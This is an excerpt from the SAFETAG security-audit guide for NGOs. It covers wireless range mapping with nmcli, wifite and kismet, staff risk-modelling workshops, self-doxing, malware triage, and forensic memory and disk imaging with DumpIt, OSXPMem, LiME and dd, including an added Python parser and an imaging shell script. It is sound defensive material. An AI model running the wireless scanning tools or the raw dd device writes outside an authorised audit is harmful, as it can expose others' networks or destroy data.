Organizations may want to choose innocent or generic network names, and/or not broadcast network names. It is worth noting that devices seeking out hidden networks will "beacon" for the actual network name, so this has extremely limited security use and must be combined with other protective measures. See this Acrylic blog post for further details.

It is worth noting that wifi access points are also tracked to assist in location services, and as such the location of a wireless network can be learned from its name or the MAC address of the access point. WiGLE is a community-managed database for such information, but both Google and Microsoft, and likely many others, also track this locational information, so the opt-out information below is only minimally useful.

Removal options: See wikipedia for public listings. Some opt-out options exist below:

Wireless Range Mapping

Summary

This component allows the auditor to show the "visibility" of an organization's wireless network to determine how far the organization's wireless network extends beyond a controlled area. Wireless networks are often trusted as equivalent to the hardwired office networks they have largely replaced, but they have important differences. Wireless networks are often "visible" from outside the walls of the office - from common spaces or even the street. Without further access, this reveals a wealth of information about the organization's size and the type of devices connecting to their network.

Overview

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjunction with the Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Materials Needed
Considerations
Walkthrough

Map the range of the organization's wireless network outside of the office space, using wifite or other tools to track network strength.

A variety of apps and tools can support this work without resorting to professional "wifi site survey" tools. If the Office Mapping exercise has taken place, that map can serve as the starting point to expand the map outside the office. If using a third-party tool or app, ensure that the app is not sharing sensitive data. Using simple signal strength monitors in combination with location notes is more than sufficient. On Linux systems, one can use wavemon, kismet, wifite, and even the NetworkManager command line tool (nmcli) to track visible networks and their strengths, as described on StackExchange:

watch 'nmcli -f CHAN,BARS,SIGNAL,SSID device wifi list ifname wlx10feed21ae1d | sort -n'
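Signal readings only become a range map once they are tied to where each one was taken. The script below is an added example (not SAFETAG's own tooling, and not part of NetworkManager) that takes the output of the nmcli command above captured at several spots, each labelled with a location and with whether that spot is inside the organization's controlled space, and reports where outside that space the office network is still usable. The scan text, the network name SampleOrg and the 30-out-of-100 "usable" threshold are constructed assumptions for the example.

```python
"""Turn location-tagged nmcli wifi scans into a simple wireless range map.

Added example for the SAFETAG guide; not the project's own code. The scans,
ORG_SSID and USABLE_SIGNAL below are constructed assumptions for illustration.
"""
import re

ORG_SSID = "SampleOrg"   # assumed name of the organization's network
USABLE_SIGNAL = 30       # constructed threshold on nmcli's 0-100 SIGNAL scale

# (location label, inside the controlled space?, constructed nmcli output)
SAMPLES = [
    ("main office", True,
     "CHAN  BARS  SIGNAL  SSID\n"
     "6     \u2582\u2584\u2586\u2588  88      SampleOrg\n"
     "11    \u2582\u2584__  41      neighbor-net\n"),
    ("stairwell outside the door", False,
     "CHAN  BARS  SIGNAL  SSID\n"
     "6     \u2582\u2584\u2586_  62      SampleOrg\n"
     "11    \u2582\u2584\u2586_  57      neighbor-net\n"),
    ("street in front", False,
     "CHAN  BARS  SIGNAL  SSID\n"
     "6     \u2582\u2584__  34      SampleOrg\n"
     "1     \u2582___  20      cafe-guest\n"),
    ("parking at the rear", False,
     "CHAN  BARS  SIGNAL  SSID\n"
     "6     \u2582___  12      SampleOrg\n"),
]

# CHAN, BARS, SIGNAL, then the SSID (which may itself contain spaces).
ROW_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\d+)\s+(.+?)\s*$")


def parse_nmcli_wifi_list(text):
    """Return {ssid: strongest SIGNAL seen}; several access points may share one SSID."""
    strongest = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # the header line does not start with a channel number
        _chan, _bars, signal, ssid = m.groups()
        strongest[ssid] = max(int(signal), strongest.get(ssid, 0))
    return strongest


def range_map(samples, ssid):
    """List (location, controlled, signal or None) for one SSID across every spot."""
    return [(loc, controlled, parse_nmcli_wifi_list(text).get(ssid))
            for loc, controlled, text in samples]


def exposed_locations(samples, ssid, threshold=USABLE_SIGNAL):
    """Spots outside the controlled space where the network is still usable."""
    return [loc for loc, controlled, sig in range_map(samples, ssid)
            if not controlled and sig is not None and sig >= threshold]


if __name__ == "__main__":
    for loc, controlled, sig in range_map(SAMPLES, ORG_SSID):
        where = "inside" if controlled else "outside"
        seen = sig if sig is not None else "not seen"
        print(f"{loc:28} {where:8} {seen}")
    print("usable from outside:", exposed_locations(SAMPLES, ORG_SSID))
```

In practice the location labels come straight from the Office Mapping sketch, and the "exposed" list is what goes into the report beside the recommendation on access point placement.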
Recommendation

Depending on the office layout, moving the wireless access point may help reduce how far the network is transmitted outside of the office space, and stationary devices can be adjusted to accommodate this without loss of functionality.

See also Monitoring Open Wireless Traffic recommendations and Network Access security recommendations.

A Day in the Life

Covered in full in User Device Assessment:

A Night in the Life

Covered in full in User Device Assessment:

Process Mapping and Risk Modeling

Summary

This component allows an auditor to lead the host organization's staff in a series of activities to identify and prioritize the processes that are critical for the organization to carry out its work. These activities will also reveal the consequences if those critical processes were interrupted or exposed to a malicious actor. This results in the staff creating a risk matrix which is used as the foundation of the auditor's recommendations.

Purpose

Having the host organization central to the risk assessment process allows the auditor to put their threats and recommendations into the host's own narrative. With greater ownership of the process, the staff will be more engaged in addressing the threats identified when the audit is complete.[77] By engaging as many staff as possible, the auditor also provides a framework for staff to examine future concerns when the auditor is gone. The existing in/formal security practices captured during this process will be used to remove organizational and psycho-social barriers to starting new practices.

The Flow of Information

Risk Modeling Information Flow

Guiding Questions

Approaches

Note: Risk modeling will require a mixed approach of exercises, and the order which you identify each component will vary depending upon the organization.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Threat Modeling Resources (General)

Risk Assessment Activities

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Risk Matrix Activities

Risk Assessment: Chapter 2 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Alternative Risk Modeling Activities

Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Activities

Process Mapping

Summary

This activity helps to identify the processes that allow the organization to function (publishing articles, payments, communicating with sources, field work, etc.), the assets and systems (websites, software, PayPal accounts) they rely on, and which ones are critical to their work.

Participating organization/s are asked to "brain-storm" a list of all the processes that are critical for their work and the auditor works to map the details of critical processes out to expose points of risk.

If done correctly, process mapping can help the auditor:

  • Identify risk exposure
  • Identify communication issues and effective incident response
  • Identify what is affected (people, systems, technologies)
  • Identify areas of improvement in securing the organization's processes
  • Generate a mitigation/solution plan for missing security controls
  • Show the importance of digital security to staff, management team and stakeholders

Overview

Remember that in any process mapping session, participants may bring up exceptions and errors. Adding the digital security dimension only makes things more complicated and messy. In order to manage your time efficiently and not end up discussing issues and solving them during the session, you must:

  1. Be firm with your goal.
    • Map out the current overall process first
    • Manage and control your audience by limiting discussion of insignificant topics
    • List all issues and errors and review them later
  2. Balance active facilitation with taking time to look for weaknesses
    • A background in digital security helps you as an auditor to identify possible ways one could exploit a weak process. While largely letting the organization drive the process creation, ask targeted questions to expose the full extent of a critical process and keep an eye on ways the processes could be vulnerable. If this is your way of thinking, you may already be formulating ideas on how to mitigate those attacks and give the best recommendation according to their process.

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Materials Needed
Considerations

This activity captures significant information about the internal processes of an organization, and requires proper documentation and secure handling. If this information is leaked, it will expose the organization's process weaknesses. If it is destroyed without a backup, you will have to redo all the steps and activities you have already done, wasting precious time.

Walkthrough

NOTE: If an auditor does not ensure that the uniquely identified subset of processes speaks to the full range of participants, their recommendations are more likely to be met with resistance.

While doing this it is important to consider level of detail you will be mapping out (this should be pre-determined or established so everyone is on the same page). You will generally want to capture:

Recommendation

Process mapping is simply documenting the steps in a certain process, or simply an inventory of why you do the things that you do. It is your job as an auditor to map the organization's existing processes in order to reach sound judgement in providing digital security recommendations or solutions.

This activity can sometimes lead to hopelessness, or challenge; it is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Modeling Using the Pre-Mortem Strategy

Summary

The pre-mortem strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan."[78]

Overview
Materials Needed
Considerations
Walkthrough

Prepare a flipchart / space on the white-board to keep track of processes, threats, impacts, and adversaries that are identified during other activities. Participants can easily get ahead of the process as they explore individual ideas. Keeping a space for these "upcoming" activities will help re-center them on the activity at hand.

Pre-Mortem Strategy: (30 Minutes) The pre-mortem strategy was devised to take participants out of a perspective of defending their plans and strategies and shielding themselves from flaws. They are given "a perspective where they [are] actively searching for flaws in their own plan."[79]

Process/Interaction Mapping (30 minutes per process):

NOTES:

  • You can add follow-on processes to examine if they are identified as critical by the participants during this activity. Specifically, the exercises in the Threat Assessment section pair well.
  • Put people on post-its to make them able to be moved around.
  • Verbally walk the participants through the completed process so you ensure you didn't miss anything.
  • Take quick notes to remind yourself of any key points not clearly marked on the map before they move on to the next activity.
  • After completing all the key events, take a photo of the whiteboard / store the chart-paper for later documentation.

Recommendation

This activity can lead to feelings of hopelessness as well as stir up direct fears or challenges that the staff face. It is important to remind the staff that any risk can be mitigated, and indeed it is the goal of an audit to identify the highest priority ones based on actual likelihood and provide guidance on mitigation.

Risk Matrix

Covered in full in Threat Identification:

Critical Data Activity

Covered in full in Data Assessment:

Self Doxing

Summary

Doxing (also "doxxing", or "d0xing", a word derived from "documents", or "docs") consists of tracing and gathering information about someone using sources that are freely available on the internet (called OSINT, or Open Source INTelligence).

Doxing is premised on the idea that "The more you know about your target, the easier it will be to find their flaws". A malicious actor may use this method to identify valuable information about their target. Once they have found sensitive information, they may publish this information for defamation, blackmail the target person, or use it for other goals.

This activity aims to help participants identify any unwanted personal information that may be publicly available online, and to make them aware of the risk of doxing and how to prevent it.

Overview

Self-doxing:

This activity is aimed at showing the group how to research the data traces they leave online, as well as to improve the results of the Manual Reconnaissance activity with research carried out by individuals on themselves, which helps protect their privacy and makes results more detailed. With this approach, the auditor will only be informed about the results if mitigation steps such as takedowns are indicated.

Materials Needed
Considerations
Walkthrough
Recommendation

Responding to Advanced Threats

Summary

This component allows the auditor to identify, triage, and analyze suspicious behavior on a device or in a network. Depending on the analysis, the auditor may need to further investigate a malware infection, analyze a binary and determine whether it is malicious or not, and recommend urgent mitigation steps.

Purpose

It is very common to find suspicious behaviors, processes, traffic and other ‘weird activities’ during a SAFETAG audit. SAFETAG practitioners should always be on the lookout for suspicious activities as they apply other SAFETAG methods and their activities, from interactions and discussions with staff to hands-on device assessment and traffic analysis.

The Flow of Information

Figure: Information Flow

Guiding Questions

Approaches

Due to the limited window of time, the auditor should focus on identifying suspicious activities and triaging them rapidly. Many of these will be false positives related to other non-malicious software causing the machine to "act weird" or other types of less serious (and non-targeted) malicious software like adware or ransomware.

When this cannot be ruled out, collecting evidence, running basic research and analysis, and assessing the risk and impact against organizational priorities will help prioritize further action. In-depth binary analysis is best kept for post-audit work during the reporting and follow-up phases. If critical assets are compromised, the auditor might need to coordinate urgent mitigation measures with other IT experts.

Time management is extremely crucial when responding to potential malware infections and similar more advanced threats. If using this method, the auditor should constantly question whether to continue this process or complete other aspects of their audit plan. At the end of the audit process, not having an understanding of the organization's risk tolerance, existing capacity, current practices/processes/policies and existing informational assets will undermine the auditor's ability to provide a prioritized report or understand the context around the potentially malicious activity they have uncovered.

Outputs

The main outputs of advanced threats identification should be evidence like files, emails, screenshots and URLs included in messages or spotted in suspicious connections.

Operational Security

Preparation

Baseline Skills

Resources

Malware Analysis

Digital Forensics

Activities

Suspicious Activity Analysis

Summary

Malware is a common tactic to target organizations. Malware like a Remote Access Trojan (or RAT) can provide an attacker with backdoor access to a targeted machine, enabling the attacker to steal information, record audio and video, as well as run commands on the infected machine.

To stop this from happening, you have to identify the malicious process within the system and stop it, or reformat the machine if you do not want to spend time on stopping the malicious process.

It is important to keep evidence. If the auditee still has access to the original malicious software they received (e.g., an email attachment), keep a copy of the file, so that you can continue investigating if you have the time and expertise, or submit it to other organizations that work on analyzing such issues.

Scanning the possibly infected machine or the original suspicious file with an anti-virus will save you time and effort if the malware is already in its database. Scanning should always be the first step, as it prevents you from spending excess time when the machine was infected with a less serious piece of malware.

After determining the machine is infected, you can proceed in helping the staff member back up their information, scanning the files for malware, then reformatting the infected machine. Note, it is very difficult to clean an infected machine if you only have a short window of time.

If the machine was infected, taking an image of the operating system will allow you to replicate the infected machine and run it after you finish your audit for a more in-depth investigation, or send it to an expert to investigate the malware. Note that this can also be difficult in an audit setting where time is limited. Also see the operational security considerations that come with replicating the files of a staff member of a sensitive organization. Be sure this is absolutely necessary and that the staff member provides consent before proceeding.

Overview

In the following, you should look for files and URLs that may indicate a compromise and may help you identify an infection. If you have time, some initial light research is suggested to see whether the URLs or file hashes have already been identified by other security researchers; this can help you provide more context to the organization around the types of threats they are facing.

Materials Needed
Considerations
Walkthrough

The next sections often are highly interrelated - a phishing email may include malicious URLs and/or files, network traffic may include URLs, URLs may try to send malicious file downloads.

Questions to ask the user / organization


Phishing or Suspicious Emails

If the organization staff has received suspicious communications, the first step should be to clearly warn the auditee that any associated files or links should not be opened.


Malicious Files

In this part, you will be investigating a file and determining whether it is malicious or not. The auditor will not have much time for this step, but a preliminary analysis (not longer than one hour) can be performed, following these instructions:

Include the hashes of the malicious files in the appendix of your assessment report.

If the organization was targeted with a more advanced attack, there is a high probability that the attacker used new or disguised malware, which means no anti-virus will flag it as malicious. In this case, if you still have doubts that a file reported as clean is in fact malicious, submit it for in-depth analysis.

In this step, you will be dealing with a machine infected by one of the binaries you analyzed in steps 1 and 2, or a machine you are sure is infected but have no time to analyze. In this case, you will take a backup, migrate the data safely to a new machine, take a full image of the system and submit it for more in-depth analysis.

See the Incident Response activity for additional details.

You will need at least one hour to prepare and carry out the advanced investigation. This step is optional, for the case where you have time, still have doubts about the file and need a more advanced result. In this step, you will analyze the suspicious file using Cuckoo Sandbox, an automated malware analysis system. If you decide to go with this option, you will need Linux installed on your audit machine; you can use this Kali guide to install Kali Linux.


Suspicious URLs

You may have found suspicious URLs in your Wireshark output during the traffic analysis, in email content, in IMs, etc.

Capture the context in which the URL was sent to the user or used by a process (sender, timestamp including timezone, and any other identifying details).

If the URL was sent to the user through a message, ask them if they clicked the link.


Suspicious Processes

If you find suspicious open ports, follow the instructions in the Network Scanning activity section "How to decide if an open port is suspicious".

It can also be useful to follow these steps:

Windows, Mac, Android

Android, iOS

See the User Device Assessment and Mobile Device Assessment activities for more in-depth device analysis.


Unusual Network Traffic

Advanced threats may be identified during the network scanning and traffic analysis. See the Network Scanning and Traffic Analysis activities.


Threat Hunting

If you went through the entire process and still have doubts about a file, email or process, or have other reasons to believe the organization may have undetected malware, you will probably need to work on a specific threat hunting procedure that matches your needs, the organization's assets, and the threat profile of potential adversaries.

The ThreatHunting.net project is collecting different threat hunting techniques in their GitHub repo.

The procedures provided there will guide you in addressing your doubts about a specific issue, which means you must at least be able to identify the category of the possible threat and then apply the steps provided by the ThreatHunting.net project.

Recommendation

Digital Forensics and Evidence Capture

Summary

This component describes the tools and procedures required to acquire an image (live or dead, depending on the situation) and securely handle data from a device (laptop, desktop, HDD, memory stick, USB stick, etc.) that is needed to later perform malware analysis or a forensic evidence process.

Overview
Materials Needed

Skills Needed

Required software - depending on the data acquisition type and the operating system, you will need the following tools:

Additional materials

Considerations
Walkthrough

The Chain of Custody: How to handle forensic data

The Chain of Custody (often referred to as audit trail or chain of evidence) is the process of preserving the integrity of the digital evidence. Being able to maintain the Chain of Custody is very important for forensic evidence. This means that you need to record, and be able to prove, that authorized personnel were in control of the evidence at all times, and that no unauthorized person, device or mechanism could have altered the evidence while in your custody.

To maintain the Chain of Custody, it is imperative to carefully document what happens to the evidence. This means:

Live or Dead Imaging?

Different processes and tools are used depending on what kind of data acquisition and investigation will be done. However, in order to make a correct decision on how to get the forensic image, you should take into account the following questions:

Regarding the definitions, we call 'dead imaging', or 'offline imaging', the process of obtaining evidence from systems that are switched off and where no data processing is taking place, while 'live imaging', or 'memory imaging', refers to the process of making a bit-by-bit copy of memory in order to preserve the volatile data available in the device. There is a lot of information of evidentiary value that could be found in a live system. Switching it off may cause loss of volatile data such as running processes, network connections and mounted file systems. On the other hand, leaving a computer running may cause evidence to be altered or deleted. Therefore the investigator needs to decide what alternative is best in each given situation. Another approach is to use specialized tools to extract volatile data from the computer before shutting it down.


Variant: Live imaging tools and procedures

Windows: DumpIt

Brief description: DumpIt helps the user to get a memory dump in Windows systems. It is easy to use and it is possible to send the DumpIt.exe file to the victim in order to facilitate the data acquisition.

Source: in order to download DumpIt, you need to register here. Instructions can be found here.

How to use DumpIt:

Note: it is easier to provide DumpIt.exe directly to the client.

  1. Make sure you have enough free space on the disk or the USB key you run the memory dump from (it must be larger than the memory to be dumped; see step 6)
  2. Download DumpIt
  3. As it is an archive, extract it (right-click, extract)
  4. Connect the hard disk or USB key with DumpIt to the computer you want to do the memory acquisition from
  5. Double-click on the file
  6. A window will pop up. Read the message in the window: if the “Address space size” is bigger than the “Free space size”, you do not have enough space in the device. In that case, you should move DumpIt.exe to an empty USB key or SD card that is bigger than the “Address space size”
  7. If the space in the device is sufficient, hit ‘y’ and wait (it can take a very long time)
  8. Compress the memory dump in an encrypted archive. The best way is to use 7-ZIP, as Windows 7 does not support encryption.

MacOS: OSXPMem

Brief description: OSXPMem is a part of the pmem suite created by the developers of Rekall. Rekall itself is a very useful utility built for both memory acquisition and live memory analysis on Windows, Linux, and OS X systems.

Source:

How to use OSXPMem:

Download the latest release (the latest OSXPMem release is 1.5.1 Furka).

  1. Unzip the package

    $ unzip osxpmem.osxpmem-2.1.post4.zip

  2. The file ownership/permissions must be changed to “root:wheel”

    $ sudo chown -R root:wheel osxpmem.app/

  3. Run OSXPMem to collect memory from the local system

    $ sudo osxpmem.app/osxpmem -o OUTPUT_DIR/FILENAME.aff4

  4. Check the information acquired

    $ sudo osxpmem.app/osxpmem -V OUTPUT_DIR/FILENAME.aff4

  5. Extract the AFF4 memory image stream into a singular raw file for parsing/analysis by other tools

    $ sudo osxpmem.app/osxpmem -e /dev/pmem -o OUTPUT_DIR/FILENAME.raw OUTPUT_DIR/FILENAME.aff4

  6. Unload the kernel extension

    $ sudo osxpmem.app/osxpmem -u

  7. Check if your OS X has a memory profile available or create one if required, in order to do the analysis with the tool Volatility.

    You can check available profiles here

Note: You also have the option of including additional local files within the resulting AFF4 volume/file via the -i </path/to/file> -i </path/to/file> command line option(s), which can be useful in producing a singular output volume containing not only memory but other files (binaries/logs/etc.) you’d like to analyze as well.

Additional information:

Linux: LiME - Linux Memory Extractor

Brief description: Linux Memory Extractor (LiME) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports dumping memory either to the file system of the device or over the network.

Source:

How to use LiME:

  1. Download the LiME source code from the Github repository.
  2. Compile it using the Linux make command.
  3. The result will be the creation of a “.ko” file in the current directory, named after the running kernel version, e.g. lime-3.2.0-59-generic.ko.
  4. Move the USB drive holding the “.ko” file to the suspect machine. Plug the USB extraction drive into the machine (assuming that it mounts successfully; otherwise you have to mount it yourself. This is not very forensically sound, but there is not much choice here).
  5. Run the command:

    sudo insmod lime-3.2.0-59-generic.ko "path=/media/USBDriveName/myRAMDump.lime format=raw"

  6. It is important that you include both the path parameter and the format parameter in the command, otherwise you’ll get the “-1 invalid parameters” error. For Ubuntu you’ll need the quotes around the path and format parameters, while in other distributions like CentOS and RedHat you won’t need them.

Memory acquisition can be achieved from remote too. Instructions on how to do it can be found here.

Additional tools and procedures from different OSs and versions can be found here


Variant: Offline / Dead imaging tools and procedures

Dead or offline imaging (also known as disk acquisition) is the action of creating a forensic image of an entire disk, where the imaging process does not alter any data on the disk, and all data, metadata, and unallocated space are included. Details on how to do this (using CLI commands or a forensic distro) can be found in the section "How to Byte-Copy Data" below (instead of using an external medium as source device, the hard disk of the victim's device should be used).

Additional tutorials can be found here:

How to Byte-Copy Data

By "target" we will refer to the hard drive or data image already acquired. When explaining the use of commands, the "target" will be also referred to as "source device", while the place where the byte-copied data will be stored is referred to as "destination device". The forensic image that will be acquired with this process will be used to execute tests without affecting the original evidence received.

Files and device block labels for the examples

For the command examples, these name conventions will be used:

  1. Prepare destination media to be used to save the forensic image

    The forensic image that will be taken from the target should be saved on a properly labeled and formatted drive with available space greater than the size of the forensic image. Execute the actions described below before approaching the target.

    • Select an equally sized or larger hard drive or storage device to store the image
    • Properly label the destination media
    • Prepare an additional USB stick to collect a file log
  2. Capture the forensic image

    There are two ways to capture the forensic image:

    1. using a bootable Linux forensic distribution on a CD or USB stick (see "Using a Forensic distribution" below), or
    2. by command line (terminal). If possible, use the forensic distribution, as this method does not mount devices by default.

Using a Forensic distribution

In case you are using the forensic distribution, for example DEFT, boot the image by following these steps:

NOTE: in order to get the DEFT boot loader started, the BIOS of the system being analyzed should be set to boot from CD-ROM/DVD-ROM/BD-ROM or from external storage devices (depending on the media containing DEFT). In any other circumstances, configure the BIOS, save and restart the system either with the DVD already inserted in your CD/DVD drive or with the USB stick already connected. We recommend changing the boot order of the devices directly in the BIOS to prevent an accidental reboot of your PC (e.g. due to a power surge).

If it is not possible to use the forensic distribution's graphical interface, just open a command line terminal.

In the command prompt (bash shell in DEFT) enter the commands detailed in each step listed below.

Step 1: in order to keep a record of the procedure, a log file will be kept on a separate USB stick.

Step 2: Write-blockers to prevent alterations.

If you use the forensic distribution option, this step can be skipped. Otherwise, the following command should be entered to prevent any data from being written to the block device, allowing mounting of the block device with read-only access.

    mount -o ro /dev/sdX /mnt/sdX/

Other block devices (the USB stick for the log or the destination block device) can be mounted without taking this precaution.

Step 3: Byte-copy the data to a data image for forensic analysis purposes.

When all the data from a disk is duplicated exactly from the source disk and stored in a file, the resulting bit-for-bit copy is called a raw image. Raw images can be created by several different utilities and frequently will use the following file extensions: .dd, .raw, .img.

There are different tools available to obtain this raw image file. Which one we use will depend on which are available for our operating system, and which tool best suits our needs. These tools are listed below.

WARNING! Be extremely careful when typing the command line for this program. Reversing the if and of flags, or confusing the label of the device block related to the source or destination device will cause the computer to destroy the evidence! Therefore it is imperative to check and re-check (and preferably have someone else check) the command before executing it.

Please keep in mind that the if= flag refers to the input file, in this case, the source device or target and the of= flag refers to the output file or destination device.

Tools for bit-by-bit copy

Command flag clarification and examples

Tool      Command Syntax
dd        dd if=/dev/sdX of=/dev/sdY
          dd if=/dev/sdX of=/mnt/sdY/[IMAGENAME].img
dc3dd     dc3dd if=/dev/sdX of=[IMAGENAME].img hash=md5 log=[LOGFILENAME].txt
ddrescue  ddrescue /dev/sdX /mnt/sdY/[IMAGENAME].img
dcfldd    dcfldd if=/dev/sdX of=/mnt/sdY/[IMAGENAME].img hash=sha1 (or hash=md5)

(In the rows that write an image file, /mnt/sdY/ stands for the mount point of the destination block device /dev/sdY; a file cannot be written directly under a device node.)
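The byte-copy step above, together with the earlier instruction to record the hashes of suspicious files for the report appendix, as an added example that is not part of the SAFETAG guide: a small POSIX shell script that images a source with dd, hashes the source and the resulting image with sha256sum, and appends every action to a chain-of-custody log. It assumes GNU coreutils on a Linux forensic boot; the operator name, the tab-separated log format and the constructed sample file that stands in for /dev/sdX are all assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the SAFETAG guide): byte-copy a source to an image
# with dd, hash source and image, and keep a chain-of-custody log.
# Assumes GNU coreutils (dd, sha256sum, awk) on a Linux forensic boot.
# The demo at the bottom uses a constructed file in place of /dev/sdX.
set -eu

# Print the SHA-256 digest of a file or block device (digest only).
hash_of() {
    sha256sum "$1" | awk '{ print $1 }'
}

# Append one tab-separated custody record: UTC timestamp, operator, event.
log_entry() {
    # $1 = log file, $2 = operator, $3 = event text
    printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$2" "$3" >> "$1"
}

# acquire_image SRC IMG LOG OPERATOR
# Copies SRC (if=, the evidence) to IMG (of=, the destination) and returns
# 0 only when the image hash equals the source hash. Refuses to overwrite
# an existing IMG so a typo cannot clobber an earlier acquisition.
acquire_image() {
    src="$1"; img="$2"; logf="$3"; operator="$4"

    [ -e "$src" ]   || { echo "source $src does not exist" >&2; return 2; }
    [ ! -e "$img" ] || { echo "refusing to overwrite $img" >&2; return 2; }

    log_entry "$logf" "$operator" "START acquisition of $src -> $img"
    src_hash=$(hash_of "$src")
    log_entry "$logf" "$operator" "SOURCE sha256=$src_hash"

    # if= is the evidence, of= is the destination: check this twice before
    # running against a real device. dd's record counts go into the log.
    dd if="$src" of="$img" bs=4096 2>> "$logf"

    img_hash=$(hash_of "$img")
    log_entry "$logf" "$operator" "IMAGE sha256=$img_hash"

    if [ "$src_hash" = "$img_hash" ]; then
        log_entry "$logf" "$operator" "VERIFIED source and image hashes match"
        return 0
    fi
    log_entry "$logf" "$operator" "MISMATCH source and image hashes differ"
    return 1
}

# Stand-alone demo on a constructed sample file (run with --demo).
if [ "${1:-}" = "--demo" ]; then
    workdir=$(mktemp -d)
    printf 'constructed sample evidence, not a real disk\n' > "$workdir/source.bin"
    acquire_image "$workdir/source.bin" "$workdir/source.img" \
                  "$workdir/custody.log" "auditor-name"
    cat "$workdir/custody.log"
fi
```

The source hash is taken before the copy and the image hash after it, so the log shows that the evidence was not altered by the acquisition itself; the same hash_of output is what goes into the report appendix for a suspicious file. Plain dd stops on the first read error, which is why the table above lists ddrescue for damaged media.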
Recommendation

See Incident Response guidance.

Forensic Analysis

Summary

This component describes how to perform an analysis on captured evidence (e.g. hard drive image or memory dump) without altering the evidence. Any alteration, or even an environment or situation that creates the possibility of alteration, could lead to rejection of the evidence in a court of law or to malware analysis failures.

Overview
Materials Needed
Considerations
Walkthrough

In most cases, reach out for help: there are multiple organizations which coordinate and can support analysis of malware targeting NGOs. The Digital First Aid Kit has a list of organizations and, in most cases, secure contact details to seek support in doing advanced analysis. The Rapid Response Network, a project of CiviCERT, is a consortium of these organizations who may be able to help. Citizen Lab is also well known for their analysis and research.

There are some procedures that must be followed to ensure the evidence is properly handled while the forensic analysis is taking place. These include:

In order to facilitate the data analysis, we recommend getting the output data from the image acquisition in raw/dd format, which is accepted as an input file by several forensic analysis tools.

To analyze the acquired data, you can use the following tools:

Recommendation

If any indicators of compromise are found, use the Suspicious Activity Analysis approach to do very initial research/analysis and triage (are these known malware or adware IoCs, etc.), and adjust your reporting and operational security procedures with the organization as appropriate.

Threat Assessment

Summary

This objective uses a variety of activities to identify possible attackers and gather background information about the capability of those attackers to threaten the organization. This consists of identifying a particular attacker's history of carrying out specific threats, their capability to carry out those threats currently, and evidence that the attacker has the intent to leverage resources against the target.

Purpose

Checking the assumptions both of the organization and of the auditor by researching the current threats will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations. Greater ownership of the process gives the staff an opportunity to explore their threat landscape and become more engaged in addressing the threats identified when the audit is complete. By engaging with as many staff as possible, the auditor provides a framework for staff to explore threat identification processes after the auditor is gone.

The Flow Of Information

Figure: Threat Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Threat Assessment Activities

Example text for introducing threats - Integrated Security

Written exercise: Threats assessment - Integrated Security

Facilitators Manual (With PDF download of "Threat Introduction Example Text" and "Threat Assessment Written Exercises") - Integrated Security

Analyzing Threats: Chapter 3 - Workbook on Security: Practical Steps for Human Rights Defenders at Risk

Threat Modeling Resources (General)

Threat research by focus area

Threat research by method

General Threats by Region

Technical Threats

Targeted Malware
Censorship and Surveillance Reports

Travel Threats

Activities

Pre-Mortem Risk Modeling

Covered in full in Risk Assessment:

Guiding Questions for High-Risk Organisations

Covered in full in Capacity Assessment:

Critical Data Activity

Covered in full in Data Assessment:

Threat Identification

Summary

These activities build off of a process or data mapping exercise to connect actual processes or assets and data of the organization with potential threats, then drilling down into specific, likely threats the organization faces, adversaries who might take advantage of them, and the impact of this happening.

The goal is to be able to answer the following questions:

Threat History

Threat Capability

Threat Intent

Overview
Materials Needed
Considerations
Walkthrough

Threat Identification (30 minutes per process):

Impact Identification (30 minutes per process): This exercise has the trainee lead the participants on a brainstorming of hypothetical consequences (impacts) when the threats identified earlier occur.

Adversary Exploration (Likelihood):

Impact Ranking: The goal of this exercise is to have the trainee lead the host organization in classifying the severity of the possible impacts from the threats they have just explored.

Recommendation

Creating a Risk Matrix

Summary
Overview
Materials Needed
Considerations
Walkthrough

After the activities are complete the auditor has tasks that build upon the outputs of the activities. These can be completed offsite.

Figure: Risk vs Difficulty

Figure: Risk vs Likelihood

Figure: Impact vs Severity
Recommendation

Threat Interaction

Summary

This helps the auditor enumerate threats that the organization is concerned about and the internal priorities of them. At the same time, it enables a discussion of how threats can interrelate and helps define the difference between a threat and a risk (a threat that has a vulnerability associated with it), and the value of mitigation.

This exercise works well with larger groups, and can be woven in to the Threat Identification activity.

Overview
Materials Needed
Considerations
Walkthrough

Also review the Threat Identification exercises below to tailor these to best meet your information gathering needs based on your interactions with the organization.

Threat Brainstorming (15 minutes)

Split participants into small groups. This grouping is particularly valuable for larger organizations, but even for small ones, having multiple separate groups helps reveal shared concerns around the threats the staff face. For a group that is too small to split, have each staff member brainstorm by themselves.

Have each group or staff member quickly write down any possible "threat" they or the organization face. Some examples ("kidnapping," "website hacked") can help seed this activity.

If you have multiple colors of stickies, having them categorize threats by "physical," "digital," or "other/both" will be useful to show their inter-relation.

Keep reminding participants of the time remaining to keep them brainstorming rather than discussing threat details or arguing over whether a threat is physical or digital.

Threat Clustering and Discussion

